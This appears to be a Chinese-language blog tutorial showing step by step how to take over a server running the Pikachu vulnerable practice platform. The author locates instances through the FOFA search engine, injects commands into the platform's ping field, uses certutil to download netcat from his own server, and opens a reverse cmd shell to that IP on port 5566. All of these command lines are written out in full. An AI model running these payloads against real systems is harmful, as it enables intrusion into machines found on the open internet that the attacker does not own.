shell反弹:Reverse shell,nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 简单的来说就是我开启监听,然后你将你的cmd命令从端口发送给我,从而控制你的cmd权限。
出站:我主动将权限经过防火墙发送出去,出站防火墙大部分允许
入站:外界经过防火墙拿走我的权限,入站防火墙安全策略较严格
1.在fofa中寻找pikachu漏洞练习平台
2. 找到平台后,在RCE-exec“ping”中输入127.0.0.1,测试是否可以ping通,若ping通,则可以趁虚而入,之后就只可以执行相应的命令了
3.学会使用NC,一般kali自带nc功能,在kali中找到nc.exe文件,拷贝出来
nc文件从哪里能拿到?
(1)打开kaili,通过locate命令全盘搜索
(2)两个文件打开都可以看看,我们可以都拷贝到物理机中,放在相应的cmd命令的根目录中,如果nc文件不对就是下面这样子
如果能用,则是
从而找到了nc.exe文件
4. 将我们需要的nc.exe放入服务器根目录中,在pikachu上执行文件下载的命令,将nc.exe文件下载到pikachu服务器上,进行反弹
这个是我买的服务器,使用宝塔搭建,根目录为c:/wwwroot/47.101.142.119
域名地址为47.李文盛的博客 – 又一个WordPress站点,
当我们访问47.101.142.119:8899/nc.exe时,会自动下载nc文件
测试
5.在pikachu平台服务器中通过命令实现nc文件的下载,同时推荐一个自动生成命令的工具
[~]#棱角 ::Edge.Forum*::Edge.Forum*https://forum.ywhack.com/bountytips.php?download
在pikachu中输入127.0.0.1 & certutil.exe -urlcache -split -f http://47.101.142.119:8899/nc.exe 1.exe,将我本地服务器的nc文件下载到pikachu服务器中,并重命名为1.exe
通过dir命令进行文件查看,下载成功
6.在本博主服务器上开启监听,端口随意5566
7.pikachu准备出站
127.0.0.1 & 1.exe -e cmd 47.101.142.119 5566
1.exe:这个是我们通过命令下载到pikachu服务器的文件,使用他为命令
-e:将cmd命令发送到47.101.142.119的5566端口
成功的拿到了pikachu服务器的cmd权限
虽然拿到了服务器的权限,但我们不搞破话坏,学习为主!